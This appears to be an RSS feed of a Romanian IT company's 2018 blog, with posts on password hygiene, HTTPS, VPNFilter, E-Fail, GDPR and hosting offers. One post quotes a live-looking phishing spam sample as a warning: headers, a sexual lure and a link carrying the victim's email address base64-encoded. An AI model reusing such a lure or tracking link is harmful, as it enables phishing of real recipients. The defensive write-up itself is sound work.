In plus, de pe serverele operate de camscape, pentru serviciile aflate in mentenanta noastra (conturi email, conturi FTP, conturi Active Directory, conturi MySQL sau PostgreSQL, etc), parolele NU pot fi citite. Parolele acestor conturi se pastreaza exclusiv criptat, nici administratorii sistemelor nu le pot citi.

Deasemenea, pe serverele camscape si pe serviciile aflate in mentenanta noastra (conturi email, conturi Active Directory, etc), implementam, de comun acord cu clientii nostri politici de expirare a parolei, reducand astfel impactul unui brute-force attack.

 

Varianta lunga, si va recomand sa cititi:

Complexitatea parolei

O parola trebuie sa fie complicata, greu de ghicit. Nu trebuie sa fie numele dvs, nu trebuie sa fie data nasterii si nici combinatii intre ele. De ce? Pentru ca exista un tip de atac care se cheama brute-force attack si care presupune incercarea rapida a diverselor cuvinte din dictionar sau in combinatie cu contul la care aceasta parola este atasata.

De exemplu, contul office@domeniumeu.ro NU trebuie sa aiba parola office123 . Timpul de ghicire a unei astfel de parole este de cateva secunde.

Mai precis, o parola pentru a fi conforma cu standardele din ziua de azi trebuie sa indeplineasca concomitent cerintele:

  • minim 14 caractere (da, ati citit bine)
  • cifre, litere mici, litere mari si semne

Problema apare in memorarea parolei complicate si NU este o idee buna notarea acesteia pe un biletel atasat de monitor.

In sensul acesta, in 2011, un comic publicat pe XKCD https://xkcd.com/936/ a revolutionat intreaga gandire a generarii de parole. Exista diverse comentarii pe aceasta tema, comentarii care ajung la matematica si nu sunt pentru cei slabi de inima: https://security.stackexchange.com/questions/6095/xkcd-936-short-complex-password-or-long-dictionary-passphrase .

XKCD 936 Password Strength Example

 

Dar pe scurt e asa:

  • nu va chinuiti cu Tr0ubad0ur! . Incercati mai curand cu eumaduclasalainfiecaremartila16:30 (asta e o idee a unui client camscape) . A doua este mult mai puternica
  • nu puneti nici cuvinte pur si simplu. maria mulge vaca are are cam aceeasi complexitate ca si mamuva, adica foarte mica. Dar daca puneti niste semne in loc de pauzele din maria mulge vaca , atunci complexitatea e mare.

Tot in sensul acesta, camscape a dezvoltat un generator de parole https://ceipam.eu/password.php . Este bazat pe baza de date DEX, dati refresh pana va convine. Dar, inca odata, copiati ideea, nu exact parola.

 

Refolosirea parolei

De la YAHOO au fost sparte 500 milioane de conturi, dupa care s-a constatat 1,5miliarde de conturi, dupa care s-a dat verdictul "toate". De la Linkedin 300 milioane. Si lista continua cu alte site-uri super vizitate. Si totusi, multi oameni au aceeasi parola si la Yahoo, si pe Linkedin, si pe mailul de la birou.

Pentru acest motiv a fost construit site-ul https://haveibeenpwned.com/ . Va puteti verifica adresa email si puteti afla daca ea impreuna cu parola asociata pe diverse site-uri este cunoscuta si de alte persoane inafara de dvs. Daca raspunsul verificarii pe site-ul mentionat este PAWNED! pentru adresa email contultau@domeniultau.ro , NU inseamna ca cineva stie parola acestui cont email. Inseamna insa ca exista undeva (si va da detalii) un site pe care ati introdus adresa email contultau@domeniultau.ro cu o anumita parola, iar aceasta combinatie este cunoscuta. Daca aceasta combinatie ati folosit-o si la ceva de care va pasa (contul email de la birou de exemplu), atunci e grav.

Luati in calcul si ca bazele de date cu parole si conturi cunoscute furate de pe site-urile mentionate in site-ul https://haveibeenpwned.com/ sunt vandute in mod curent pe TOR cu 50-100 USD. Adica nu putini hackeri cunosc aceste parole ale dvs.

Asa ca daca cumva primiti un mesaj in care vi se spune ca cineva va stie parola si va cere diverse plati, in site-ul sus mentionat puteti verifica de unde anume va stie parola. Si schimbati-o. Rapid.

Pe viitor, niciodata sa nu mai folositi aceeasi parola pe mai multe conturi. Eventual alegeti urmatoarea varianta:

  • separati conturile in conturi critice (emailul de la birou, contul Active Directory, banci, etc) si non critice (contul de la comanda catering de exemplu)
  • pentru conturile critice, setati parole complexe, diferite de la un cont la altul
  • pentru conturile non critice, setati aceeasi parola peste tot, simpla, usor de tinut minte

 

Schimbarea parolei la un anumit interval

Aceasta este o politica de securitate care nu trebuie sa lipseasca din nici o companie pentru conturile de email, conturile de Active Directory sau alte conturi. Si totusi putini o implementeaza.

Avantajele sunt cel putin doua:

  • o protectie suplimentara in fata brute-force attack
  • expirarea automata a conturilor pe care HR-ul a "uitat" sa le comunice ca disabled

 

 

 

]]>
HTTPS Obligatoriu https://www.camscape.ro/compania/blog/https-obligatoriu Sat, 30 Jun 2018 10:24:47 +0300 De ceva vreme Google ne impinge pe toti la trecerea site-urilor pe HTTPS.

Incepand cu Iulie 2018, odata cu lansare Google Chrome 68, orice site fara HTTP va fi afisat ca Insecure conform Blog-ului Google: https://security.googleblog.com/2018/02/a-secure-web-is-here-to-stay.html

Astfel, noul browser va arata asa orice site fara certificat HTTPS:

Google Chrome 68 HTTP is Insecure

Nu indepartati vizitatorii de site-ul dvs. Va putem oferi certificate HTTPS la preturi competitive, putem implementa chiar si certificate gratuite Letsencrypt si avem si scripturi automatizate de supraveghere a expirarii, de alarmare si chiar de reinoire automata.

 

]]>
Atac Spam sustinut https://www.camscape.ro/compania/blog/atac-spam-sustinut Mon, 25 Jun 2018 07:53:11 +0300 Incepand cu 23 Iunie 2018, un nou val de spam a fost observat pe serverele administrate de camscape, spam cu scopul de a infecta clientii care fac imprudenta de a urmari linkul propus.

Ce este deosebit de aceasta data e ca mesajele par perfect legitime, au SPF setat, DKIM perfect, contin numai text si chiar si acela atat de variat incat o regula anti spam pe el este dificil de implementat. Motivatia este destul de simpla: mesajele sunt trimise de pe servere legitime, dar infectate. Un exemplu mai jos.

Totusi, incepand cu 25 Iunie 2018, un nou set de reguli anti spam a fost implementat cu succes pe serverele administrate de camscape, atat la nivel anti spam cat si pe Spamtrap pentru a bloca si retine in blocaj IP-urile serverelor infectate.

Va rugam sa ne atentionati de fiecare data cand observati astfel de atacuri care nu se rezuma la un simplu spam ratacit. Nu urmariti orice link primit prin email, nu accesati linkuri care nu au legatura cu domeniul celui care a trimis mesajul.

 

Received: from server.dailynews2u.com (43.252.212.125)
  by mail.camscape.ro with ESMTPS (DHE-RSA-AES256-GCM-SHA384 encrypted); 24 Jun 2018 06:38:27 -0000
Received-SPF: pass (mail.camscape.ro: SPF record at thumb.com.my designates 43.252.212.125 as permitted sender)
DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed;
	d=thumb.com.my; s=default; h=To:Date:Message-Id:Subject:Mime-Version:
	Content-Type:Content-Transfer-Encoding:From:Sender:Reply-To:Cc:Content-ID:
	Content-Description:Resent-Date:Resent-From:Resent-Sender:Resent-To:Resent-Cc
	:Resent-Message-ID:In-Reply-To:References:List-Id:List-Help:List-Unsubscribe:
	List-Subscribe:List-Post:List-Owner:List-Archive;
	bh=s/sTOCbF2hqNZLQEu7Q2oPjH//F7Jq1SSZVnIdP5tWI=; b=VfTdO/ja0pJXuksA9t7QHT+NMi
	i7xs7FuHXcxK+mVG25CpOxFJaw1P9U4w+LMwMBWXgB/FBKwCj2uyb1QR+LN+DnF7WlzCTGQuig22X
	a1y4KbRH0QDAMAA2tLUUvMvQ8GfNm318PlmY+EiguX0mH1Vd1fyz0KAZALyZS7SUjqy0=;
Received: from [200.23.230.38] (port=32769 helo=[127.0.0.1])
	by server.dailynews2u.com with esmtpsa (TLSv1:ECDHE-RSA-AES256-SHA:256)
	(Exim 4.91)
	(envelope-from <steven@thumb.com.my>)
	id 1fWydw-0005oK-Bj; Sun, 24 Jun 2018 14:37:01 +0800
From: steven@thumb.com.my
Content-Transfer-Encoding: base64
Content-Type: text/plain; charset=UTF-8
Mime-Version: 1.0 (1.0)
Subject: Henriette
Message-Id: <68EC8D4F-A4EB-6B79-B84A-49CFDF26C364@thumb.com.my>
Date: Sun, 24 Jun 2018 08:37:00 +0200

Hey, my future inamorato!
A pleasant cutie needs the assistance of a real gentleman.
I stay alone in my apartment and have problems with my Jacuzzi.
Admire pics of it and, of course, some my nudes 


example_link://somedomain.com/ms4lfszc/lzod1mr3d.php?c2VydmljZUBjYW1zY2FwZS5ybw==
]]>
DOT Cloud Active Directory https://www.camscape.ro/compania/blog/dot-cloud-active-directory Tue, 12 Jun 2018 23:41:15 +0300 Active Directory inseamna mult mai mult decat stocare de fisiere si chiar decat useri cu drepturi diferite de acces. Active Directory inseamna securitate si management centralizat al statiilor de lucru, un aspect extrem de important in mediul IT.
 
Dar implementarea clasica on-premises, in interiorul retelei existente atrage cheltuieli semnificative. Pe langa unul sau mai multe servere performante, este nevoie de dulap de comunicatie, UPS, camera tehnica pentru asigurarea securitatii fizice, racire si altele. De multe ori, 1000 EUR pentru un server ajung sa se transforme in 3000 EUR pentru intreaga solutie, lucru greu de inclus in bugetele companiilor mici.
 
Dar pentru ca si companiile cu bugete mici sau cele cu spatiu mic de birouri au nevoie de Active Directory, camscape a proiectat DOT Cloud Active Directory.
 
DOT Cloud Active Directory este o solutie completa cu caracteristici evidente de securitate:
  • locatia datelor este in datacentere Tier3, deci protectia fizica este asigurata
  • locatia datelor este in Romania pentru o viteza cat mai mare de acces la datele stocate
  • sistemul este protejat cu un firewall performant
  • accesul se face numai prin canal VPN IPsec criptat conform standardelor actuale, folosind certificate si autentificare unica cu credentialele utilizatorului. Nu exista comunicatie necriptata cu sistemul
  • include stocare de fisiere, incepand de la 100GB spatiu, fara limita superioara
  • include management de utilizatori si grupuri
  • include drepturi de acces per director si per fisier, read-write sau read-only al utilizatorilor sau grupurilor
  • include politici de parola (expirare, lungime, complexitate)
  • include politici de securitate pentru protectia statiilor de lucru cu orice sistem de operare Microsoft Windows
  • numar nelimitat de utilizatori, nu exista o taxa per utilizator
  • dispozitive multiple (smartphone, notebook, tableta, statie de lucru) si sisteme de operare multiple (Microsoft Windows, Linux, IOS)
  • WPA Enterprise (802.1x, RADIUS) in reteaua locala cu autentificare din cloud
  • include optional backup off-site incremental zilnic
 
Avantaje principale ale DOT Cloud Active Directory fata de solutiile clasice Active Directory on-premises:
  • economia pe termen scurt prin transformarea investitiei initiale intr-o chirie lunara, incepand cu 99,00 EUR/luna + TVA
  • economia de spatiu fizic in birourile companiei
  • asigurarea protectiei fizice a datelor
 
Dezavantaje principale ale DOT Cloud Active Directory fata de solutiile clasice Active Directory on-premises:
  • viteza de acces depinde de tipul de conexiune la internet
Cloud Active Directory
 
]]>
Microsoft cumpara GitHub https://www.camscape.ro/compania/blog/microsoft-cumpara-github Tue, 05 Jun 2018 00:18:16 +0300 Intr-un blog de azi 04 Iunie 2018, Co-fondatorul GitHub, Chris Wanstrath anunta achizitia GitHub de catre Microsoft: https://blog.github.com/2018-06-04-github-microsoft/

Unul dintre cele mai cunoscute proiecte opensource, dedicat exclusiv opensource este astfel achizitionat de catre Microsoft pentru 7.5 Miliarde USD. Chris Wanstrath devine director in cadrul Microsoft. Microsoft, acelasi care a cumparat in 2016 CodePlex pentru a il inchide imediat aproape, nu inainte de a recomanda utilizatorilor folosirea .... GitHub.

Iar Chris Wanstrath are pseudonimul defunkt pe blogul sau. Sa insemne oare ca vom vedea o istorie asemanatoare cu MySQL cumparat de Oracle care a generat doua super produse Percona DB si Maria DB? Vom vedeam in maxim 2 ani.

 

]]>
GDPR : Data Protection Experts https://www.camscape.ro/compania/blog/gdpr-data-protection-experts Sun, 03 Jun 2018 22:36:42 +0300 GDPR a fost activat pe 25 mai 2018 si in aceeasi zi am fost invitati sa participam la o conferinta organizata de JURIDICE.ro ( https://www.juridice.ro ) prin Data Protection Experts ( https://www.dataprotectionexperts.ro ) pe tema implementarii GDPR in Romania.

In sala Alexandru Ioan Cuza a CCIR, conferinta organizata de Data Protection Experts a avut 300 de invitati (si 80 de cereri suplimentare refuzate). In fata acestora s-au prezentat 25 de experti reuniti de Data Protection Experts, printre care si noi, camscape.

Subliniem inca odata ca GDPR este pana la urma despre PROTECTIA datelor cu caracter personal si asta include in primul rand norme si metode IT, nu doar proceduri. Va invitam deci la discutii pe aceasta tema, suntem siguri ca va putem oferi solutii de securitate eficiente si la un raport calitate/pret excelent.

Puteti vedea aici interventia noastra:

Textul integral al conferintei il puteti accesa aici: https://www.youtube.com/watch?list=PLkvczt8a6IzWM23Y550zSsFj94vda0xx_&v=BAZA0B67r6o

Iar reactiile in presa nu au intarziat sa apara:

http://www.mediafax.ro/economic/experti-despre-gdpr-regulamentul-a-venit-peste-noi-fara-sa-ne-permita-sa-ne-punem-la-punct-cu-el-17230933

https://www.antena3.ro/actualitate/gdpr-anuntul-alarmant-al-specialistilor-470721.html

 

]]>
VPNFilter - Un atac informatic care a afectat 500.000 de echipamente https://www.camscape.ro/compania/blog/vpnfilter-un-atac-informatic-care-a-afectat-500000-de-echipamente Tue, 29 May 2018 10:26:00 +0300 Intr-un post publicat pe 23 Mai 2018, Talos, o companie de cybersecurity din grupul Cisco, anunta descoperirea unui atac malware care a infectat cel putin 500.000 de routere SoHo din intreaga lume: https://blog.talosintelligence.com/2018/05/VPNFilter.html
 
Se pare ca sursa atacului este o organizatie ruseasca cunoscuta ca FancyBear, Sofacy si alte denumiri.
 
Modalitatea de atac este prin folosirea unei vulnerabilitati Tomato (un server web folosit pe aceste routere pentru interfata de management). Evident, inseamna ca numai device-urile direct conectate la internet au fost afectate, unde direct conectat la internet poate insemna si un port forward.
 
Device-uri afectate:
 
Linksys: E1200, E2500, WRVS4400N
Mikrotik: 1016, 1036, 1072
Netgear: DGN2200, R6400, R7000, R8000, WNR1000, WNR2000
QNAP: TS251, TS439 Pro
TP-LINK: R600VPN
 
Daca device-ul dvs este in lista de mai sus, recomandarea este din pacate un reset to factory default si reconfigurarea echipamentului. Un simplu reboot nu rezolva decat o parte a problemei.
 
Interesant este ca FBI recomanda aplicarea acestui procedeu pe orice router SoHo, nu numai cele din lista: https://www.ic3.gov/media/2018/180525.aspx
 
Cu alte cuvinte, daca va simtiti nesiguri si daca datele dvs au oarecare importanta pentru dvs, ar fi bine sa securizati reteaua aplicand recomandarea de mai sus. Si in general, renuntati la port forward.
]]>
E-Fail : o vulnerabilitate PGP https://www.camscape.ro/compania/blog/e-fail-o-vulnerabilitate-pgp Tue, 29 May 2018 09:09:12 +0300 PGP (Pretty Good Privacy https://en.wikipedia.org/wiki/Pretty_Good_Privacy ) este un protocol vechi de 27 de ani care permite transmiterea mesajelor email criptate end-to-end . Si pentru alte criptari de altfel.

Adica, utilizatorul Mihai doreste sa trimita un mesaj criptat catre utilizatorul Ionel. Mihai are doua chei, una privata cu care poate decripta mesajul si una publica cu care cripteaza mesajul. Ionel, la fel, doua chei, publica si privata, diferite de cele ale lui Mihai. Mihai si Ionel isi trimit unul altuia cheile publice si isi pastreaza fiecare propriile chei private. Dupa asta, folosind pluginuri specifice fiecarui client email, mesajele dintre Mihai si Ionel vor fi criptate in asa fel incat numai detinatorii cheilor private vor putea citi mesajele.

Totul frumos timp de 27 de ani, cand, un grup de cercetatori a descoperit o bresa majora de securitate: https://www.eff.org/deeplinks/2018/05/not-so-pretty-what-you-need-know-about-e-fail-and-pgp-flaw-0 

De remarcat ca problema nu este a protocolului PGP ci a implementarilor acestuia la nivelul diverselor pluginuri din Mozilla Thunderbird, Apple Mail, Microsoft Outlook dar si din servicii cunoscute precum Signal. Aici de exemplu https://ivan.barreraoro.com.ar/signal-desktop-html-tag-injection-variant-2/ puteti vedea o demonstratie de hack pe mesajele criptate din Signal.

De mentionat ca aceasta vulnerabilitate nu este nici pe departe atat de grava cum este prezentata. Conditiile pe care un atacator trebuie sa le indeplineasca pentru a obtine acces la datele dvs sunt mult prea complicate si dependente de diverse ocazii improbabile pentru ca un atac sa reuseasca cu adevarat. Dar.... pe fondul GDPR totul devine mai fierbinte.

La momentul acestui articol, toate cele de mai sus au primit patch-uri de securitate, deci tot ce aveti de facut este un simplu update.

 

]]>
Hosting in UK https://www.camscape.ro/compania/blog/hosting-in-uk Tue, 08 May 2018 21:50:59 +0300 Hosting in UK pe masini virtuale sau servere dedicate.

Pe langa hosting-ul cunoscut operat de noi in datacenter-e din Romania si Germania, am lansat un nou serviciu care ofera hosting in UK, Londra. Singura masina virtuala creata pana acum in acest nou datacenter o puteti accesa la https://www.capital87.co.uk .

Hosting in UK reprezinta o solutie foarte buna pentru cei ce doresc prezenta web pe piata britanica. Conexiunile la Internet nu sunt de aceeasi capacitate ca in Romania si latenta conteaza enorm. Din acest motiv dar si pentru imaginea companiei dvs in fata clientilor sai, cat si pentru Google (SEO), va recomandam hostingul in UK pentru cazul in care aveti un potential de clienti britanici.

Oferta ramane neschimbata: Hosting VPS in UK . Pentru alte configuratii sau pentru servere dedicate, va rog sa ne contactati.

 

 

]]>